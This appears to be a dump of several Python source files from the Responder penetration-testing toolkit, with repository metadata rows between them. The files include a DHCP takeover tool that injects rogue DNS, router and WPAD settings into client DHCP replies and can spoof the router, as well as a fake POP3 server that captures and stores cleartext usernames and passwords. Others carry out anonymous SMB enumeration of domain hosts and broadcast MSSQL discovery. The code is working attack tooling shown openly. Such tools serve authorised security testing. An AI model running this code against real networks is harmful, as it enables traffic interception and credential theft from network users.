'Dialin': (ord(data[1]) >> 2) & 1,
'Xenix': (ord(data[1]) >> 3) & 1,
'NT Workstation': (ord(data[1]) >> 4) & 1,
'WfW': (ord(data[1]) >> 5) & 1,
'Unused': (ord(data[1]) >> 6) & 1,
'NT Server': (ord(data[1]) >> 7) & 1,
'Potential Browser': (ord(data[2]) >> 0) & 1,
'Backup Browser': (ord(data[2]) >> 1) & 1,
'Master Browser': (ord(data[2]) >> 2) & 1,
'Domain Master Browser': (ord(data[2]) >> 3) & 1,
'OSF': (ord(data[2]) >> 4) & 1,
'VMS': (ord(data[2]) >> 5) & 1,
'Windows 95+': (ord(data[2]) >> 6) & 1,
'DFS': (ord(data[2]) >> 7) & 1,
'Local': (ord(data[3]) >> 6) & 1,
'Domain Enum': (ord(data[3]) >> 7) & 1,
}
return ', '.join(k for k,v in AllRoles.items() if v == 1)
class BrowserListener(BaseRequestHandler):
def handle(self):
data, socket = self.request
lock = Lock()
lock.acquire()
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
Fprint = WorkstationFingerPrint(data[190:192])
Roles = ParseRoles(data[192:196])
print text("[BROWSER] Request Type : %s" % ReqType)
print text("[BROWSER] Address : %s" % self.client_address[0])
print text("[BROWSER] Domain : %s" % Domain)
print text("[BROWSER] Name : %s" % Name)
print text("[BROWSER] Main Role : %s" % Role1)
print text("[BROWSER] 2nd Role : %s" % Role2)
print text("[BROWSER] Fingerprint : %s" % Fprint)
print text("[BROWSER] Role List : %s" % Roles)
RAPThisDomain(self.client_address[0], Domain)
lock.release()
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
self.allow_reuse_address = 1
UDPServer.server_bind(self)
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server.serve_forever()
except:
print "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
if __name__ == "__main__":
try:
print "Listening for BROWSER datagrams..."
thread.start_new(serve_thread_udp_broadcast,('', 138, BrowserListener))
while True:
time.sleep(1)
except KeyboardInterrupt:
sys.exit("\r Exiting...") | 4,217 | Python | .py | 99 | 40.111111 | 106 | 0.607317 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,396 | FindSQLSrv.py | SpiderLabs_Responder/tools/FindSQLSrv.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from socket import *
print 'MSSQL Server Finder 0.1'
s = socket(AF_INET,SOCK_DGRAM)
s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
s.settimeout(2)
s.sendto('\x02',('255.255.255.255',1434))
try:
while 1:
data, address = s.recvfrom(8092)
if not data:
break
else:
print "==============================================================="
print "Host details:",address[0]
print data[2:]
print "==============================================================="
print ""
except:
pass
| 1,299 | Python | .py | 35 | 33.742857 | 80 | 0.644956 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,397 | DHCP.py | SpiderLabs_Responder/tools/DHCP.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import struct
import optparse
import ConfigParser
import os
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from odict import OrderedDict
from packets import Packet
from utils import *
parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-d', '--dnsname', action="store", help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME")
parser.add_option('-r', '--router', action="store", help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
parser.add_option('-p', '--primary', action="store", help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
parser.add_option('-s', '--secondary', action="store", help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
parser.add_option('-n', '--netmask', action="store", help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
parser.add_option('-w', '--wpadserver', action="store", help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
parser.add_option('-S', action="store_true", help="Spoof the router ip address",dest="Spoof")
parser.add_option('-R', action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")
options, args = parser.parse_args()
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
if options.Interface is None:
print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
exit(-1)
elif options.RouterIP is None:
print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
exit(-1)
elif options.DNSIP is None:
print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
exit(-1)
elif options.DNSIP2 is None:
print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
exit(-1)
print '#############################################################################'
print '## DHCP INFORM TAKEOVER 0.2 ##'
print '## ##'
print '## By default, this script will only inject a new DNS/WPAD ##'
print '## server to a Windows <= XP/2003 machine. ##'
print '## ##'
print '## To inject a DNS server/domain/route on a Windows >= Vista and ##'
print '## any linux box, use -R (can be noisy) ##'
print '## ##'
print '## Use `RespondTo` setting in Responder.conf for in-scope targets only. ##'
print '#############################################################################'
print ''
print color('[*]', 2, 1), 'Listening for events...'
config = ConfigParser.ConfigParser()
config.read(os.path.join(BASEDIR,'Responder.conf'))
RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
Interface = options.Interface
Responder_IP = FindLocalIP(Interface)
ROUTERIP = options.RouterIP
NETMASK = options.Netmask
DHCPSERVER = Responder_IP
DNSIP = options.DNSIP
DNSIP2 = options.DNSIP2
DNSNAME = options.DNSNAME
WPADSRV = options.WPAD.strip() + "\\n"
Spoof = options.Spoof
Respond_To_Requests = options.Respond_To_Requests
if Spoof:
DHCPSERVER = ROUTERIP
##### IP Header #####
class IPHead(Packet):
fields = OrderedDict([
("Version", "\x45"),
("DiffServices", "\x00"),
("TotalLen", "\x00\x00"),
("Ident", "\x00\x00"),
("Flags", "\x00\x00"),
("TTL", "\x40"),
("Protocol", "\x11"),
("Checksum", "\x00\x00"),
("SrcIP", ""),
("DstIP", ""),
])
class UDP(Packet):
fields = OrderedDict([
("SrcPort", "\x00\x43"),
("DstPort", "\x00\x44"),
("Len", "\x00\x00"),
("Checksum", "\x00\x00"),
("Data", "\x00\x00"),
])
def calculate(self):
self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
class DHCPACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("DHCPCode", "\x35"), #DHCP Message
("DHCPCodeLen", "\x01"),
("DHCPOpCode", "\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op51", "\x33"),
("Op51Len", "\x04"),
("Op51Str", "\x00\x01\x51\x80"), #Lease time, 1 day
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", "\xfc"),
("Op252Len", "\x04"),
("Op252Str", ""), #Wpad Server
("Op255", "\xff"),
("Padding", "\x00"),
])
def calculate(self):
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
self.fields["Op15Str"] = DNSNAME
self.fields["Op252Str"] = WPADSRV
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
class DHCPInformACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("Op53", "\x35\x01\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", "\xfc"),
("Op252Len", "\x04"),
("Op252Str", ""), #Wpad Server.
("Op255", "\xff"),
])
def calculate(self):
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
self.fields["Op15Str"] = DNSNAME
self.fields["Op252Str"] = WPADSRV
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
def SpoofIP(Spoof):
return ROUTERIP if Spoof else Responder_IP
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
elif RespondTo and ClientIp not in RespondTo:
return False
elif ClientIp in RespondTo or RespondTo == []:
if ClientIp not in DontRespondTo:
return True
return False
def ParseSrcDSTAddr(data):
SrcIP = socket.inet_ntoa(data[0][26:30])
DstIP = socket.inet_ntoa(data[0][30:34])
SrcPort = struct.unpack('>H',data[0][34:36])[0]
DstPort = struct.unpack('>H',data[0][36:38])[0]
return SrcIP, SrcPort, DstIP, DstPort
def FindIP(data):
IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
return ''.join(IP[0:4])
def ParseDHCPCode(data):
PTid = data[4:8]
Seconds = data[8:10]
CurrentIP = socket.inet_ntoa(data[12:16])
RequestedIP = socket.inet_ntoa(data[16:20])
MacAddr = data[28:34]
MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
OpCode = data[242:243]
RequestIP = data[245:249]
# DHCP Inform
if OpCode == "\x08":
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP),
GiveClientIP=socket.inet_aton("0.0.0.0"),
NextServerIP=socket.inet_aton("0.0.0.0"),
RelayAgentIP=socket.inet_aton("0.0.0.0"),
ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
elif OpCode == "\x03" and Respond_To_Requests: # DHCP Request
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
elif OpCode == "\x01" and Respond_To_Requests: # DHCP Discover
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
def SendDHCP(packet,Host):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(packet, Host)
if __name__ == "__main__":
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
s.bind((Interface, 0x0800))
while True:
try:
data = s.recvfrom(65535)
if data[0][23:24] == "\x11": # is udp?
SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
if SrcPort == 67 or DstPort == 67:
ret = ParseDHCPCode(data[0][42:])
if ret:
print text("[DHCP] %s" % ret)
except KeyboardInterrupt:
sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
| 13,751 | Python | .py | 291 | 44.649485 | 213 | 0.571875 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,398 | POP3.py | SpiderLabs_Responder/servers/POP3.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from utils import *
from SocketServer import BaseRequestHandler
from packets import POPOKPacket
# POP3 Server class
class POP3(BaseRequestHandler):
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
return self.request.recv(1024)
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
self.SendPacketAndRead()
except Exception:
pass | 1,493 | Python | .py | 44 | 31 | 71 | 0.7213 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,399 | Browser.py | SpiderLabs_Responder/servers/Browser.py | #!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler
from utils import *
import struct
def WorkstationFingerPrint(data):
return {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x01" :"Windows XP",
"\x05\x02" :"Windows XP(64-Bit)/Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
"\x06\x02" :"Windows 8/Server 2012",
"\x06\x03" :"Windows 8.1/Server 2012R2",
"\x10\x00" :"Windows 10/Server 2016",
}.get(data, 'Unknown')
def RequestType(data):
return {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
"\x09": 'Get Backup List Request',
"\x0a": 'Get Backup List Response',
"\x0b": 'Become Backup Browser',
"\x0c": 'Domain/Workgroup Announcement',
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
}.get(data, 'Unknown')
def PrintServerName(data, entries):
if entries <= 0:
return None
entrieslen = 26 * entries
chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
l = []
for x in ServerName:
fingerprint = WorkstationFingerPrint(x[16:18])
name = x[:16].replace('\x00', '')
l.append('%s (%s)' % (name, fingerprint))
return l
def ParsePacket(Payload):
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
if StatusCode == "\x00\x00":
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
return None
def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None:
print text("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None:
print text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None:
print text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == "\x73\x00":
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == "\x75\x00":
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == "\x25\x00":
s.close()
return ParsePacket(data)
except:
pass
def BecomeBackup(data,Client):
try:
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
if ReqType == "Become Backup Browser":
ServerName = BrowserPacket[1:]
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role = NBT_NS_Role(data[45:48])
if settings.Config.AnalyzeMode:
print text("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
print RAPThisDomain(Client, Domain)
except:
pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
print text('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
print RAPThisDomain(Client, Domain)
except:
pass
class Browser(BaseRequestHandler):
def handle(self):
try:
request, socket = self.request
if settings.Config.AnalyzeMode:
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception:
pass
| 6,313 | Python | .py | 157 | 36.961783 | 188 | 0.695289 | SpiderLabs/Responder | 4,450 | 1,663 | 44 | GPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |